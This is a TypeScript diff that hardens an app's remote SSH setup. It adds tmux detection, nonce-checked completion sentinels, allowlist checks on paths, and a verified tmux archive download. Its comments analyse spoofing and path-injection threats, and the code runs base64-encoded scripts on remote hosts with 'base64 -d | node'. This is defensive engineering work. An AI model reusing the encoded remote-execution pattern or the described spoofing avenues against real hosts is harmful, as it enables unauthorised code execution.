   if (hooksLiteral) sesCfgParts.push(`hooks:${hooksLiteral}`)
 
@@ -194,6 +271,49 @@ export function generateRemoteSetupScript(
     // WRITE rather than a leaked secret -- weaker than the token files, but the
     // same primitive, and it is the last write here without the guard.
     `try{fs.rmSync(shimPath,{force:true})}catch{}try{fs.writeFileSync(shimPath,${shimLiteral},{mode:0o755,flag:'wx'})}catch{}`,
+    // #242 tmux detection, tier 1-2. Tier 1: PATH, via the `command -v`
+    // shell builtin (not `which` -- not guaranteed present on minimal
+    // images). Tier 2: ~/.claude/bin/tmux, the staging path a later tier
+    // (base64 push / pinned static build) writes a self-fetched binary to.
+    // fs.accessSync(X_OK) rather than existsSync -- a staged-but-not-yet-
+    // chmod'd file must not be reported as usable. Tiers 3+ (remote
+    // curl/wget fetch, host-side base64 push, --continue degradation) are
+    // NOT implemented here; a miss at both tiers reports 'none' and
+    // pty-manager falls back to the bare (non-tmux) claude launch. Run
+    // BEFORE the sesCfg build below -- CCC_TMUX_BIN in the statusLine
+    // command needs `tmuxPath` to already exist.
+    //
+    // #242 round-3 correction (I3): `tmuxClass` -- not `tmuxPath` -- is what
+    // crosses back over the wire in the `setup ok` sentinel below.
+    // `tmuxPath` itself stays purely local to THIS remote script, feeding
+    // only the CCC_TMUX_BIN bake-in a few lines down (read back by the
+    // statusline shim's own child process on the SAME host, never sent to
+    // the local Conductor) -- pty-manager's launch-command sink
+    // (buildTmuxLaunchCommand, ssh-tmux.ts) no longer accepts a
+    // remote-reported path for either tier at all, so there is nothing left
+    // for a wire-carried path to influence.
+    `let tmuxPath='';let tmuxClass='none';try{tmuxPath=require('child_process').execSync('command -v tmux',{encoding:'utf8'}).trim();if(tmuxPath)tmuxClass='path'}catch{}`,
+    `if(!tmuxPath){const cb=path.join(claudeDir,'bin','tmux');try{fs.accessSync(cb,fs.constants.X_OK);tmuxPath=cb;tmuxClass='home'}catch{}}`,
+    // #242 MAJOR (round 2, adversarial review): allowlist guard on tmuxPath,
+    // BEFORE its one remaining consumer below (CCC_TMUX_BIN). `command -v
+    // tmux` and the ~/.claude/bin access check both hand back a value this
+    // script does not control -- a shell function, alias, or wrapper named
+    // `tmux` on the remote PATH, or (via the base64-push/pinned-binary tiers
+    // this ladders toward) a staged file whose path this run doesn't fully
+    // own -- and that value reaches the CCC_TMUX_BIN bake-in (sesCfgParts,
+    // read back into a `sh -c` command on every statusline refresh).
+    // Character class is IDENTICAL to SAFE_TMUX_BIN_RE in src/main/ssh-tmux.ts
+    // -- that is the paired definition for this same shape of value at ITS
+    // sink (parseTmuxStageSentinel's tier-3/4 path capture), and the two
+    // must never drift apart. CLEAR rather than throw (both tmuxPath AND
+    // tmuxClass): this whole script runs under `2>/dev/null`
+    // (getRemoteSetupCommand) so a thrown error here is silently swallowed
+    // and setup aborts outright (shim never staged, settings never
+    // written); clearing instead degrades to the pre-#242 bare (non-tmux)
+    // launch and an empty CCC_TMUX_BIN -- the same fail-closed choice this
+    // codebase already makes for every other shape of bad value on this
+    // ladder.
+    `if(tmuxPath&&!/^[A-Za-z0-9_./-]+$/.test(tmuxPath)){tmuxPath='';tmuxClass='none'}`,
     // Read the user's shared settings FIRST so the per-session settings file
     // can inherit every top-level key (outputStyle, permissions, future
     // additions). The two CCC-owned keys (statusLine, hooks) then override
@@ -244,7 +364,25 @@ export function generateRemoteSetupScript(
     `try{fs.writeFileSync(sp,JSON.stringify(s,null,2))}catch{}`,
     `try{const cj=path.join(home,'.claude.json');if(fs.existsSync(cj)){let c=JSON.parse(fs.readFileSync(cj,'utf-8'));let mut=false;if(c.mcpServers){if(c.mcpServers['conductor-vision']){delete c.mcpServers['conductor-vision'];mut=true}if(c.mcpServers['conductor']){delete c.mcpServers['conductor'];mut=true}}if(mut)fs.writeFileSync(cj,JSON.stringify(c,null,2))}}catch{}`,
     `try{const md=path.join(claudeDir,'CLAUDE.md');let c=fs.readFileSync(md,'utf-8');const rx=/\\n?\\n?<!-- VISION-INSTRUCTIONS-START -->[\\s\\S]*?<!-- VISION-INSTRUCTIONS-END -->\\n?/g;if(rx.test(c)){c=c.replace(rx,'').trim();fs.writeFileSync(md,c?c+'\\n':'')}}catch{}`,
-    `process.stdout.write('setup ok\\n')`,
+    // Sentinel now carries the tmux result alongside the original
+    // completion marker: pty-manager's parseTmuxSentinel requires an EXACT
+    // match on THIS session's nonce, immediately after 'setup ok', before
+    // ever latching completion OR reading the tmux= field -- #242 finding
+    // F1 (b)/I2 correction: latching used to be gated on a bare substring
+    // check ('setup ok' with no nonce requirement), so a spoofed sentinel
+    // lacking the nonce (a co-tenant's wall/write, a MOTD script, any other
+    // PTY writer) could still latch completion early and starve the real
+    // sentinel of ever being parsed -- see parseTmuxSentinel's doc comment
+    // (pty-manager.ts).
+    //
+    // #242 round-3 correction (I3): the field itself is now a fixed CLASS
+    // (`path`/`home`/`none`), never a path -- `tmuxClass` above, NOT
+    // `tmuxPath`. pty-manager's launch-command sink picks the actual
+    // command token (`"$(command -v tmux)"` for `path`, the fixed
+    // `$HOME/.claude/bin/tmux` literal for `home`) from a host-authored
+    // literal table keyed on this class, so there is no wire-reported path
+    // for a spoofed sentinel to influence even with a stolen/copied nonce.
+    `process.stdout.write('setup ok ${nonce} tmux='+tmuxClass+'\\n')`,
   ]
   return lines.join(';')
 }
@@ -291,12 +429,26 @@ export function buildRemoteSessionCleanupCommand(sessionId: string): string {
  * Why base64? The setup script is a multi-line Node.js program that configures
  * the statusline shim and MCP vision in ~/.claude/settings.json. Sending it
  * directly through the PTY would be unreliable (quoting, line breaks, echo).
- * Instead we base64-encode it and pipe through `base64 -d | node`:
+ * Instead we base64-encode it and pipe through `base64 -d | node`, all as ONE
+ * typed line (joined with `;`, not real newlines -- shown broken out below
+ * only for readability):
  *
- *   stty -echo          ← suppress terminal echo so the blob isn't visible
+ *   stty -echo
  *   echo '<base64>' | base64 -d | node   ← decode and execute
- *   stty echo           ← restore echo
+ *   stty echo
  *   cd <path> && clear  ← navigate to project and clean the screen
+ *
+ * #242 finding F7 correction: `stty -echo` does NOT make this line's OWN
+ * echo invisible, and never did -- it's the first statement of the SAME
+ * line, so the tty has already echoed the whole thing (base64 blob
+ * included) back to the user before any of it executes (identical false
+ * claim corrected on buildTmuxStageCommand's doc comment, ssh-tmux-stage.ts
+ * -- the two builders share this exact shape). What actually keeps the
+ * plaintext, sentinel-carrying setup SCRIPT invisible is that this line only
+ * ever contains its opaque base64 encoding, never the script text itself.
+ * `stty -echo` genuinely earns its keep for a keypress typed WHILE `node` is
+ * running the decoded script; `stty echo` restores normal echo once it's
+ * done.
  *
  * The script itself is generated by generateRemoteSetupScript() above.
  * All errors are suppressed (2>/dev/null) so a failed setup doesn't break
@@ -325,11 +477,78 @@ export function getRemoteSetupCommand(
   sessionId: string,
   remotePath: string,
   hooksConfig: { port: number; secret: string } | null,
-  opts?: { includeStatusLine?: boolean; includeConductorMcp?: boolean },
+  opts: { includeStatusLine?: boolean; includeConductorMcp?: boolean } | undefined,
+  nonce: string,
 ): string {
   assertSafeRemotePath(remotePath)
-  const script = generateRemoteSetupScript(sessionId, hooksConfig, opts)
+  const script = generateRemoteSetupScript(sessionId, hooksConfig, opts, nonce)
   const b64 = Buffer.from(script).toString('base64')
   // `cd --` so a path beginning with "-" is treated as an operand, not an option.
   return `stty -echo 2>/dev/null; echo '${b64}' | base64 -d | node 2>/dev/null; stty echo 2>/dev/null; cd -- ${remotePath} && clear`
+}
+
+/**
+ * #242 finding F3 (MAJOR, adversarial review round 5). `generateRemoteSetupScript`
+ * bakes CCC_TMUX_BIN into the per-session settings file from the TIER-1/2
+ * probe result alone -- on a host where both tiers miss, that bake-in is the
+ * empty string. Tiers 3/4 run STRICTLY AFTER that file is written (see
+ * writeHostSetupCmd/writeContainerSetupCmd vs. writeTmuxStageCmd in
+ * pty-manager.ts) and, on success, install a real binary and wrap the
+ * claude launch in `tmux new-session -A` -- but nothing rewrote the settings
+ * file the statusline shim's $TMUX branch reads $CCC_TMUX_BIN from. Net
+ * effect pre-fix: the shim traces `no-ccc-tmux-bin`, falls through to
+ * /dev/tty / the ancestor-pts walk, both of which land on the pane pty tmux
+ * swallows -- the statusline silently stops updating for exactly the host
+ * population tiers 3/4 exist to serve.
+ *
+ * Fix: after a stage/push `ok` sentinel resolves, pty-manager writes this
+ * tiny follow-up remote command (base64-wrapped like every other setup
+ * fragment on this ladder, so its own echo carries no meaningful plaintext)
+ * BEFORE the claude launch write, patching the ALREADY-WRITTEN
+ * settings-<safeSid>.json's `statusLine.command` in place.
+ *
+ * #242 finding F1(a), round-2 correction: this function no longer takes a
+ * `tmuxBin` parameter at all. An earlier version received the stage/push
+ * sentinel's reported path and interpolated it directly -- the same
+ * remote-reported-path trust the F1(a) fix removed from
+ * `buildTmuxLaunchCommand` (ssh-tmux.ts). Consistency mattered here too: a
+ * spoofed `ok path=/tmp/.claude/bin/tmux` would otherwise have landed in
+ * $CCC_TMUX_BIN even after the launch-command sink stopped trusting it,
+ * silently reopening the same shape of hole one level down. The emitted
+ * script instead computes `path.join(os.homedir(),'.claude','bin','tmux')`
+ * itself, evaluated by the REMOTE `node` process at the same trust boundary
+ * `buildTmuxStageScript`/`buildTmuxPushControlScript` install to -- so this
+ * patch and the launch command it supports are pointed at the exact same
+ * fixed location, with no wire-reported operand in between.
+ *
+ * #242 finding I4: `tmuxBin` is real remote output (`os.homedir()`), not
+ * wire-controlled -- but generateRemoteSetupScript's OWN CCC_TMUX_BIN
+ * bake-in (the `tmuxPath` guard a few lines up in that function) re-checks
+ * the identical class of value against the SAME allowlist right before the
+ * SAME sink (`statusLine.command`, `sh -c`'d by Claude Code on every
+ * statusline refresh) -- this patch script skipped that guard, so a `$HOME`
+ * containing a space (or any other shell-meaningful byte the unquoted
+ * `CCC_TMUX_BIN=<value>` splice can't survive) would silently corrupt the
+ * statusline command instead of degrading. Applying the SAME
+ * `/^[A-Za-z0-9_./-]+$/` allowlist here, and skipping the whole patch
+ * (leaving whatever CCC_TMUX_BIN generateRemoteSetupScript already baked
+ * in -- empty on a tier-1/2 miss, which is exactly when this patch runs)
+ * rather than writing a broken command, closes that gap the same way the
+ * sibling already does.
+ */
+export function buildTmuxBinPatchCommand(sessionId: string): string {
+  const safeSid = sessionId.replace(/[^a-zA-Z0-9_-]/g, '_')
+  const script = [
+    `const fs=require('fs'),path=require('path'),os=require('os')`,
+    `const p=path.join(os.homedir(),'.claude','settings-${safeSid}.json')`,
+    `let tmuxBin=path.join(os.homedir(),'.claude','bin','tmux')`,
+    `if(!/^[A-Za-z0-9_./-]+$/.test(tmuxBin))tmuxBin=''`,
+    `let s={};try{s=JSON.parse(fs.readFileSync(p,'utf-8'))}catch{}`,
+    `if(tmuxBin&&s.statusLine&&typeof s.statusLine.command==='string'){` +
+      `s.statusLine.command=s.statusLine.command.replace(/CCC_TMUX_BIN=\\S*/,'CCC_TMUX_BIN='+tmuxBin);` +
+      `try{fs.writeFileSync(p,JSON.stringify(s,null,2))}catch{}` +
+    `}`,
+  ].join(';')
+  const b64 = Buffer.from(script).toString('base64')
+  return `echo '${b64}' | base64 -d | node 2>/dev/null`
 }

--- a/src/main/providers/types.ts
+++ b/src/main/providers/types.ts
@@ -110,12 +110,17 @@ export interface SshCapableProvider extends SessionProvider {
   /** Returns shell command to write settings + statusline shim on remote.
    *  opts mirror the renderer master switches (absent = on):
    *  includeStatusLine=false omits the statusLine stanza; includeConductorMcp=false
-   *  writes an empty remote mcpServers (no built-in tools). */
+   *  writes an empty remote mcpServers (no built-in tools).
+   *  `nonce` (#242 finding F1 (b)): host-generated per-session random token
+   *  (randomId(), src/shared/id.ts) baked into the `setup ok` sentinel this
+   *  command's script emits -- required, not optional, so a caller cannot
+   *  silently regress to the pre-nonce sentinel shape. */
   configureRemoteSettings(
     sessionId: string,
     remotePath: string,
     hooksConfig: { port: number; secret: string } | null,
-    opts?: { includeStatusLine?: boolean; includeConductorMcp?: boolean },
+    opts: { includeStatusLine?: boolean; includeConductorMcp?: boolean } | undefined,
+    nonce: string,
   ): string
 }
 

--- a/src/main/pty-chunked-write.ts
+++ b/src/main/pty-chunked-write.ts
@@ -35,6 +35,28 @@ export interface ChunkedWriteHooks {
    *  bailed (isAlive false), or a write threw. Lets a caller resolve a Promise
    *  (e.g. PasteQueue's envelope writer). No-op for callers that don't pass it. */
   onDone?: () => void
+  /**
+   * #242 tier 4: called after EVERY successful chunk write with the
+   * cumulative byte count actually written so far and the total. Lets a
+   * caller surface progress (pty-manager forwards it to
+   * emitSshFlowState('running-setup', 'staging tmux NN%') for the ~1.27 MB
+   * tmux-push transfer, with zero new IPC channels) without this module
+   * knowing anything about SSH flow state. Monotonically non-decreasing,
+   * ending at `data.length` on a full, successful write — NOT called on a
+   * liveness bail or a throwing write, since `offset` only advances on a
+   * write that actually succeeded (reporting progress for bytes that were
+   * never delivered would be a lie the caller has no way to detect).
+   *
+   * #242 round-3 MINOR fix: this call is itself wrapped in a try/catch
+   * inside `runChunkedWrite` (a throwing hook must not abort the write or
+   * escape the setTimeout callback — see the module doc comment at the top
+   * of this file for why that matters). Today's only caller
+   * (pty-manager's `emitSshFlowState` wrapper) already swallows internally,
+   * but a hook that can throw and take the whole write down with it would
+   * be exactly the hazard this module exists to prevent, so the guard lives
+   * here rather than trusting every future caller to add its own.
+   */
+  onProgress?: (bytesSent: number, totalBytes: number) => void
 }
 
 /**
@@ -47,6 +69,7 @@ export function runChunkedWrite(data: string, hooks: ChunkedWriteHooks): void {
   const size = hooks.chunkSize ?? WRITE_CHUNK_SIZE
   const delay = hooks.delayMs ?? WRITE_CHUNK_DELAY
   const schedule = hooks.schedule ?? ((fn, ms) => { setTimeout(fn, ms) })
+  const total = data.length
   let offset = 0
   let finished = false
   const done = (): void => { if (!finished) { finished = true; hooks.onDone?.() } }
@@ -61,6 +84,16 @@ export function runChunkedWrite(data: string, hooks: ChunkedWriteHooks): void {
       return done() // session died mid-paste; drop the rest rather than crash main
     }
     offset = end
+    // #242 round-3 MINOR fix: a throwing onProgress hook must not propagate
+    // out of this setTimeout-driven callback -- same reasoning as the
+    // hooks.write try/catch just above (see the module doc comment): the
+    // global uncaughtException handler re-throws anything that isn't
+    // EPIPE/EIO, crashing main. onProgress is a caller-supplied hook with no
+    // control over what it does; a progress hook must never be able to
+    // abort the write it's merely observing.
+    try {
+      hooks.onProgress?.(offset, total)
+    } catch { /* a progress hook must never abort the write */ }
     if (offset < data.length) {
       schedule(writeNext, delay)
     } else {

--- a/src/main/pty-manager.ts
+++ b/src/main/pty-manager.ts
@@ -1,8 +1,15 @@
-import { BrowserWindow, nativeTheme } from 'electron'
+import { BrowserWindow, nativeTheme, app } from 'electron'
 import * as pty from 'node-pty'
 import { PasteQueue } from './paste-queue'
 import { runChunkedWrite, WRITE_CHUNK_SIZE } from './pty-chunked-write'
+import { buildTmuxLaunchCommand, isSafeTmuxBin, buildSshClaudeFlags } from './ssh-tmux'
+import { randomId } from '../shared/id'
+import { resolveRunningClaudeInfo } from '../shared/ssh-tmux-persistence'
+import { buildTmuxStageCommand, TMUX_STAGE_SENTINEL_PREFIX, TMUX_STAGE_SHA256, tmuxStageAssetUrl, type TmuxStageTarget } from './ssh-tmux-stage'
+import { buildTmuxPushCommand, buildArchProbeCommandBracketed, parseArchProbeSentinel, PUSH_ACCUMULATOR_VAR } from './ssh-tmux-push'
 import * as os from 'os'
+import * as https from 'https'
+import * as crypto from 'crypto'
 import { execSync } from 'child_process'
 import { logPtyOutput, isDebugModeEnabled } from './debug-capture'
 import { shouldRegisterRun } from './logging/should-register-run'
@@ -12,7 +19,7 @@ import { buildClaudeLaunchCommand, resolveResumeLaunch, buildResumeTranscriptPat
 import { ensureCompanionDir, nodeFsCompanionDeps } from './logging/companion-dir'
 import { logInfo, logDebug, logError, logWarn } from './debug-logger'
 import { writeCliSetupPty, getResourcesDirectory } from './ipc/setup-handlers'
-import { buildRemoteSessionCleanupCommand } from './providers/claude/ssh-shim'
+import { buildRemoteSessionCleanupCommand, buildTmuxBinPatchCommand } from './providers/claude/ssh-shim'
 import { isGlobalVisionRunning, getGlobalVisionConfig, teardownVisionSession } from './vision-manager'
 import { getConductorMcpPort } from './conductor-mcp-server'
 import { buildSshArgs } from './ssh-args'
@@ -115,6 +122,501 @@ function escapeShellArg(str: string): string {
   return str.replace(/[\\"$`]/g, '\\$&')
 }
 
+/**
+ * Escape a string for literal (non-special) use inside `new RegExp(...)`.
+ * #242 finding F1 (b): the per-session nonce is interpolated into
+ * parseTmuxSentinel/parseTmuxStageSentinel's dynamically-built regexes below
+ * -- randomId() (src/shared/id.ts) only ever produces lowercase hex, which
+ * has no regex meaning, but this call site takes a plain `string` (the test
+ * seam `_getSshNonceForTest` and any future caller aren't bound to that
+ * guarantee), so escaping defends against a future nonce source that isn't
+ * charset-limited the same way.
+ */
+function escapeRegExp(str: string): string {
+  return str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')
+}
+
+/** The two usable tmux CLASSES `parseTmuxSentinel` can return -- see its doc
+ *  comment and generateRemoteSetupScript (ssh-shim.ts) for what each means. */
+export type TmuxDetectionClass = 'path' | 'home'
+
+/**
+ * Parse the `tmux=<path|home|none>` CLASS field off the `setup ok`
+ * completion sentinel (#242 — the tmux detection result rides the SAME
+ * sentinel the setup script already emits, rather than a second
+ * round-trip), AND gate the sentinel's own nonce match in one place so
+ * every caller (the outer completion latch AND the tmux-class read) shares
+ * the identical match (#242 finding I1/I2 correction, below).
+ *
+ * #242 round-3 correction (finding I3): the field is a fixed three-way
+ * CLASS, never a path. `generateRemoteSetupScript` (ssh-shim.ts) reports
+ * `path` (tier 1 — tmux found via `command -v tmux` on the remote's PATH),
+ * `home` (tier 2 — a pre-existing, executable `~/.claude/bin/tmux`, the
+ * SAME fixed location tier 3/4 stage/push a binary to), or `none`. There is
+ * no free-text capture left for `isSafeTmuxBin`/`isPinnedTmuxPath` to
+ * validate — the fixed alternation IS the allowlist — so both of those
+ * checks (and the wire-reported path they used to gate) are gone; see
+ * ssh-tmux.ts's `ON_PATH_TMUX_BIN_EXPR`/`STAGED_TMUX_BIN_EXPR` for the two
+ * host-authored literal tokens a caller picks between using ONLY the class
+ * this function returns, never a value read off the wire.
+ *
+ * Returns THREE distinct outcomes, because "the field wasn't there" and
+ * "the field explicitly said none" are not the same thing (adversarial
+ * review, #242 MINOR — call sites used to do `parseTmuxSentinel(data) ??
+ * detectedTmuxSource`, which cannot tell them apart and so lets a
+ * `tmux=none` from a LATER stage, e.g. container setup, inherit an EARLIER
+ * stage's detected class instead of clearing it):
+ *   - `undefined` — the sentinel is not present in THIS data (regex miss),
+ *     the nonce is missing/wrong, or the chunk ends before the class token's
+ *     trailing line terminator. Callers must leave any detected-tmux state
+ *     untouched.
+ *     - #242 finding I1 fix: callers pass the ACCUMULATED per-session
+ *       buffer (`bufferSetupLine`, below), not just the current chunk — a
+ *       real SSH link routinely segments this single logical line across
+ *       multiple PTY chunks (`setup ok <nonce> tmux=pa` | `th\r\n`), and the
+ *       chunk-boundary discipline above (require the trailing terminator)
+ *       correctly refuses a truncated read from the FIRST chunk alone; the
+ *       bug was that nothing ever re-parsed the SECOND chunk once an
+ *       earlier, unrelated latch had already fired off a bare substring
+ *       check, so the tmux probe was lost silently on every segmented line
+ *       (adversarial review / live-test repro, #242 finding I1).
+ *     - #242 finding I2 fix: this is ALSO what a spoofed bare `setup ok`
+ *       (no nonce, or the wrong one) now produces for BOTH purposes — the
+ *       outer completion latch is gated on this SAME nonce-bearing match,
+ *       not a separate bare-substring check, so a write-only attacker can
+ *       no longer latch completion early (starving the genuine, later
+ *       sentinel of ever being parsed and forcing an unwanted tier-3/4
+ *       staging attempt on a host that already had tmux).
+ *   - `null` — the field parsed and explicitly reported `none`. Callers
+ *     must CLEAR any detected-tmux state.
+ *   - `'path'` or `'home'` — a validated CLASS (see `TmuxDetectionClass`).
+ *
+ * `nonce` (#242 finding F1 (b)): this session's host-generated random token.
+ * The sentinel must carry it, immediately after "setup ok", or the WHOLE
+ * match fails (returns `undefined`, i.e. "not present in this chunk") —
+ * this is what makes a spoofed sentinel (a co-tenant's `wall`/`write`, a
+ * MOTD script, any other PTY writer that doesn't know this session's nonce)
+ * indistinguishable from "no sentinel here" rather than a rejected-but-seen
+ * value. SECOND layer only: an attacker who can also read the tty can copy
+ * the nonce verbatim (this line's own echo is not suppressed) — but even
+ * then there is no path left to substitute; the worst a copied nonce buys
+ * is forcing CCC to pick between the two fixed literal tokens, never an
+ * arbitrary one.
+ */
+export function parseTmuxSentinel(data: string, nonce: string): TmuxDetectionClass | null | undefined {
+  const m = data.match(new RegExp(`setup ok ${escapeRegExp(nonce)} tmux=(path|home|none)(?=[\\r\\n])`))
+  if (!m) return undefined
+  if (m[1] === 'none') return null
+  return m[1] as TmuxDetectionClass
+}
+
+/**
+ * Parse the tier-3 staging sentinel (#242) that `buildTmuxStageCommand`
+ * (ssh-tmux-stage.ts) writes to the remote PTY: either
+ * `ccc-tmux-stage ok path=<abs-path>` or `ccc-tmux-stage fail=<reason>`.
+ *
+ * Same chunk-boundary discipline as parseTmuxSentinel above: the captured
+ * token must be immediately followed by a line terminator, so a chunk that
+ * ends mid-path/mid-reason (before the trailing `\n` the shell's own `echo`
+ * always appends) returns `undefined` rather than a truncated value — the
+ * caller leaves staging pending and waits for the next chunk instead of
+ * treating a half-arrived line as the real result.
+ *
+ * The `ok` path is raw remote output — re-applies the SAME charset
+ * allowlist (`isSafeTmuxBin`) here, before the value is returned in the
+ * parse result. #242 finding F1(a), ROUND-2 CORRECTION: this function used
+ * to ALSO apply a path-pin (`isPinnedTmuxPath`, requiring the path end in
+ * "/.claude/bin/tmux") as a security gate on this field -- removed, because
+ * "ends with the right suffix" is satisfiable from an attacker-writable
+ * directory (`/tmp/.claude/bin/tmux`, or the double-slash
+ * `/tmp/x//.claude/bin/tmux`) and is NOT equivalent to "really is under
+ * $HOME" (verified end to end, adversarial review round 5, WITH a valid
+ * nonce). The fix is not a stronger check on this field -- it is to stop
+ * needing this field for anything security-relevant at all:
+ * `buildTmuxLaunchCommand` (ssh-tmux.ts) never reads the result's `path` for
+ * a staged tier, embedding `STAGED_TMUX_BIN_EXPR` (a fixed, host-authored
+ * `"$HOME"/.claude/bin/tmux` literal) instead. #242 round-3 MINOR correction:
+ * the result's `path` is never assigned to any state at all — the only
+ * consumer is the adjacent `logInfo` call at each call site, inline. The
+ * charset check that remains here exists purely so a malformed/garbage
+ * capture can't pollute logs with control characters, not as a security
+ * boundary.
+ *
+ * `nonce` (#242 finding F1 (b)): required immediately after
+ * TMUX_STAGE_SENTINEL_PREFIX, same contract as parseTmuxSentinel's own
+ * `nonce` param above -- a sentinel missing it, or carrying the wrong one,
+ * is indistinguishable from "not present in this chunk" (`undefined`), not
+ * a rejected-but-seen value.
+ *
+ * `reason` (#242 M2, MINOR): capped to a bounded, charset-guarded value
+ * before it flows into flow-state IPC and logs -- the failure sentinel's
+ * fail=<reason> field is raw remote output like the path is, and previously
+ * `\S+` let an unbounded/garbage value straight through. The script itself
+ * only ever emits arch/download/digest/extract/terminfo (ssh-tmux-stage.ts,
+ * ssh-tmux-push.ts), all short lowercase words, so a real reply always
+ * passes; anything else degrades to 'invalid-reason' rather than being
+ * echoed verbatim.
+ *
+ * #242 finding I5: both capture groups are now BOUNDED (`\S{1,4096}`), not
+ * unbounded `\S+`. This value is informational-only (never reaches a launch
+ * command), but it still gets written into the remote shell's own recovery
+ * path (nothing here does that today, but nothing prevents a future editor
+ * from assuming a capped value) and unconditionally into logs/flow-state
+ * IPC -- a multi-kilobyte capture is resource/log noise regardless. 4096 is
+ * ample headroom for any real path or reason word this script emits.
+ */
+const MAX_FAIL_REASON_LEN = 32
+const SAFE_FAIL_REASON_RE = /^[A-Za-z0-9_-]+$/
+const MAX_TMUX_STAGE_CAPTURE_LEN = 4096
+
+function sanitizeFailReason(raw: string): string {
+  if (raw.length > MAX_FAIL_REASON_LEN) return 'invalid-reason'
+  return SAFE_FAIL_REASON_RE.test(raw) ? raw : 'invalid-reason'
+}
+
+export function parseTmuxStageSentinel(
+  data: string,
+  nonce: string,
+): { ok: true; path: string } | { ok: false; reason: string } | undefined {
+  const m = data.match(new RegExp(`${TMUX_STAGE_SENTINEL_PREFIX} ${escapeRegExp(nonce)} (ok path=(\\S{1,${MAX_TMUX_STAGE_CAPTURE_LEN}})|fail=(\\S{1,${MAX_TMUX_STAGE_CAPTURE_LEN}}))(?=[\\r\\n])`))
+  if (!m) return undefined
+  if (m[2]) return isSafeTmuxBin(m[2]) ? { ok: true, path: m[2] } : { ok: false, reason: 'unsafe-path' }
+  return { ok: false, reason: sanitizeFailReason(m[3] ?? 'unknown') }
+}
+
+// === #242 tier 4: host-side tmux archive cache ===
+//
+// Tier 4 pushes the SAME v3.7b release asset tier 3 would have curled, over
+// the SSH tunnel itself, for remotes with no outbound egress at all. The
+// host downloads each arch's archive AT MOST ONCE (per app install) into
+// `app.getPath('userData')/tmux-cache/`, sha256-verifying it against the
+// SAME `TMUX_STAGE_SHA256` constants ssh-tmux-stage.ts uses, and reuses the
+// cached file for every later session that needs that arch. `userData`
+// (not `getDataDirectory()`, the pattern github-update.ts uses for the
+// ~100-200MB installer) is fine here — this archive is a few hundred KB and
+// is not itself an executable staged for direct execution on THIS machine.
+
+function tmuxCacheDir(): string {
+  return path.join(app.getPath('userData'), 'tmux-cache')
+}
+
+function tmuxCachePath(arch: TmuxStageTarget): string {
+  return path.join(tmuxCacheDir(), `tmux-${arch}.tar.gz`)
+}
+
+function sha256Hex(buf: Buffer): string {
+  return crypto.createHash('sha256').update(buf).digest('hex')
+}
+
+/**
+ * Read a previously-cached archive for `arch`, re-verifying its sha256
+ * before trusting it. A cache file that fails verification (disk
+ * corruption, a manual edit, a leftover from a since-changed pinned tag) is
+ * deleted rather than returned, so the caller re-downloads instead of
+ * repeatedly pushing a bad archive down every future session to this arch.
+ */
+function readCachedTmuxArchive(arch: TmuxStageTarget): Buffer | null {
+  try {
+    const p = tmuxCachePath(arch)
+    if (!fs.existsSync(p)) return null
+    const buf = fs.readFileSync(p)
+    if (sha256Hex(buf) !== TMUX_STAGE_SHA256[arch]) {
+      try { fs.unlinkSync(p) } catch { /* best-effort */ }
+      return null
+    }
+    return buf
+  } catch {
+    return null
+  }
+}
+
+/**
+ * Download the v3.7b release asset for `arch` from the SAME pinned URL
+ * ssh-tmux-stage.ts's remote script would have curled, sha256-verify it
+ * against the SAME embedded digest, and cache it on success. Resolves
+ * `null` (never rejects) on ANY failure -- network error, non-2xx status,
+ * or a digest mismatch -- so the caller's fallback path (fall through to the
+ * unwrapped launch) is a single, uniform check regardless of WHY the bytes
+ * couldn't be obtained.
+ */
+/**
+ * Per-request timeout for the tier-4 archive fetch -- applied to BOTH the
+ * initial request and the redirect hop. Matches httpsDownload's shape
+ * (github-update.ts:515, its 'timeout' handler ~:640) rather than inventing
+ * a second one: a bare `https.get(url, cb)` with no `timeout` option and no
+ * `req.on('timeout')` handler never gives up on a stalled connection on its
+ * own (#242 finding F1). A few-hundred-KB release asset over a healthy link
+ * completes in low single-digit seconds; 20s is generous without eating
+ * meaningfully into DOWNLOAD_TIMEOUT_MS's 45s flow-level backstop
+ * (pty-manager.ts's SSH branch, attemptTmuxPush).
+ */
+const TMUX_DOWNLOAD_REQUEST_TIMEOUT_MS = 20000
+
+/**
+ * Hard ceiling on the accumulated response body -- mirrors httpsDownload's
+ * `maxBytes` parameter (github-update.ts:515). The real v3.7b release asset
+ * is a few hundred KB; capping at a few MB catches a hostile/misbehaving
+ * host serving an unbounded body long before it becomes a meaningful memory
+ * concern (#242 finding F5). Checked ON THE WIRE in the `data` handler, not
+ * after landing -- same reasoning as httpsDownload's own comment on this.
+ */
+const TMUX_ARCHIVE_MAX_BYTES = 8 * 1024 * 1024
+
+function downloadAndCacheTmuxArchive(arch: TmuxStageTarget): Promise<Buffer | null> {
+  // #242 finding F6: same URL parts buildTmuxStageScript's remote curl/wget
+  // fragment builds its `_url` from (ssh-tmux-stage.ts) -- see
+  // ssh-tmux-push.test.ts's regression test tying the two together.
+  const url = tmuxStageAssetUrl(arch)
+  const collect = (res: import('http').IncomingMessage, resolve: (v: Buffer | null) => void, redirectsLeft: number, currentUrl: string): void => {
+    // GitHub release assets 302 to a signed S3 URL -- one redirect hop is
+    // the real-world shape; refuse to follow more than a couple to avoid an
+    // unbounded chain against a misbehaving/hostile host.
+    const loc = res.headers.location
+    if (res.statusCode && res.statusCode >= 300 && res.statusCode < 400 && loc && redirectsLeft > 0) {
+      res.resume()
+      // #242 round-2 MAJOR fix: `https.get` THROWS SYNCHRONOUSLY (not via
+      // 'error') when its URL argument is not https or is relative/malformed
+      // -- verified in this worktree (`https.get('http://x')` ->
+      // ERR_INVALID_PROTOCOL; `https.get('/relative')` -> ERR_INVALID_URL).
+      // `loc` here is a `Location` header taken straight from the response,
+      // i.e. attacker/proxy-controlled -- a captive portal or misbehaving
+      // proxy answering with a 302 to an `http://` login page or a relative
+      // path would throw OUT of this response callback, past the try/catch
+      // that wraps only the FIRST request below, into
+      // process.on('uncaughtException') (debug-logger.ts) which re-throws
+      // anything that isn't EPIPE/EIO -> Electron main process death.
+      // Resolve `loc` against the CURRENT request's URL first (so a
+      // relative Location is handled the way browsers/curl handle it, not
+      // rejected outright) and refuse anything that resolves to a
+      // non-https scheme, THEN wrap the redirect `https.get` call itself in
+      // a try/catch -- the initial call already has one; this hop must not
+      // be the exception.
+      let nextUrl: URL
+      try {
+        nextUrl = new URL(loc, currentUrl)
+      } catch {
+        resolve(null)
+        return
+      }
+      if (nextUrl.protocol !== 'https:') {
+        resolve(null)
+        return
+      }
